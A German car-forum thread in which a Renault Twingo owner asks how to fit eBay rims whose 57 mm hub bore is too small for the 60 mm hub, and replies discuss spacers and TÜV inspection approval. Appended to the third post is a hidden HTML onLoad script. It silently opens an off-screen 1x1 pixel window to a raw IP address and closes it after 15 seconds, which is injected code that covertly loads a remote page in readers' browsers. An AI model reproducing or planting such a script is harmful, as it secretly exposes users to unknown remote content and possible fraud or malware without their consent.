Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Felgendaten....
#1
Hatte bei ebay powertech 5 sternfelgen 7x13 et 25 mit nem 4 x 100er lochkranz ersteigert und machte ein langes gesicht als ich feststellen musste das die narbenaufnahme der felge 3 mm zu klein ist !!! 57mmm statt der erforderlichen 60 Sad
Kann man die öffnung in einer dreherei aufdrehen lassen oder sollte man da lieber abstand von nehmen ? oder gibt es andere möglickeiten die auf meinen 95er twingo drauf zu machen `?
und generell gefragt bevor ich wieder falsch kaufe:

die erforderlichen daten sind 7x13 4x100 LK und narbenaufnahme 60mm ?? welche ETs sind denn bei einem 95er generell unproblematisch ohne grössere Karrosseriearebieten ?? Hilfe !!*G*
Zitieren
Es bedanken sich:
#2
Hi,
also mit etwas handwerklichem Geschick und Möglichkeiten könntest Du evtl die Felgen benutzen.
Zwar handelt es sich bei den Felgen um VW Felgen.
Du müsstest also ein paar distanzscheiben mit zentrierung für vw fahren und die Zentrierung an den Distanzscheiben innen abdrehen damit sie auf deine Radnabe passen.
Die zweite Möglichkeit wäre du nimmst einfach ganz schmale distanzscheiben ohne Zentrierung dann kannst du die felgen auch fahren müsstest halt mal sehen wie es mit der breite hinkommt also fünfer scheiben müssten gehen dann hättest du effektiv et 20 das sollte noch gehen ohne ziehen kommt halt auf die Tieferlegung an.
Ein Tipp noch zum Schluss für die erste Lösung würde ich auf jeden Fall vorher nen TÜV fragen ob er da mitmacht...
Zitieren
Es bedanken sich:
#3
Wenn du dem TÜVler was von abdrehen erzählst wird er dir erst mal ins Gesicht springen und mit dem Finger auf die Tür zeigen, aber es gibt spezielle distanzscheiben mit ner umsetzung für die Zentrierung. Einfach mal beim Reifenhändler oder Autozubehörfachhandel (geiles Wort Wink ) nachfragen.

Ben

<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>
Zitieren
Es bedanken sich:


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste